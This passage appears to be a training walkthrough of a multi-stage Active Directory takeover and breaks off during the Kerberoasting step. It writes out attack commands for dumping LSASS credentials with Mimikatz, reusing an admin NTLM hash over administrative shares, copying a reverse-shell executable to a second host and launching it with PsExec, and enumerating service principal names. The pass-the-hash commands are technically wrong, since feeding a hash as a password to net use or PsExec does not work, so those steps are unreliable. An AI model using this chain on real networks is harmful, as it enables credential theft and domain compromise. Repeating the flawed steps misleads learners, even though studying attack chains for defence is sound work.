Scenario 1: Multi‑Stage AD Takeover / Full Chain Analysis

1- Initial Foothold (Phishing → Payload → User Access)

• Attacker crafts a spear‑phishing email containing a malicious Office macro.
• Victim (UserA) opens the attachment → macro drops evil.exe into C:\\Users\\UserA\\AppData\\Temp\\.
• Code execution is achieved on Host A under UserA’s context, establishing the initial foothold.

2- Credential Harvesting & Pass‑the-Hash (PtH)

• Run Mimikatz to dump credentials from LSASS:

  mimikatz # sekurlsa::logonpasswords
  

• Extract the NTLM hash for a privileged user (e.g., CORP\\Admin).

• Reuse the hash to authenticate to remote hosts via administrative shares:

  net use Z: \\\\HOST-B\\C$ /user:CORP\\Admin <admin_hash>
  

• The attacker now has file-system-level access to Host B.

3- Lateral Movement via PsExec

• Copy a reverse-shell to Host B:

  Copy-Item .\\rev.exe Z:\\Windows\\Temp\\rev.exe
  

• Execute remotely using PsExec (leveraging ADMIN$ share + RPC):

  psexec \\\\HOST-B -u CORP\\Admin -p <admin_hash> C:\\Windows\\Temp\\rev.exe
  

• SYSTEM-level access is gained on Host B, enabling further attack stages.

4- Kerberoasting (Offline Service Account Password Recovery)

• Enumerate SPNs across the domain:

  Get-ADUser –Filter * –Properties ServicePrincipalName |
  ? { $_.ServicePrincipalName }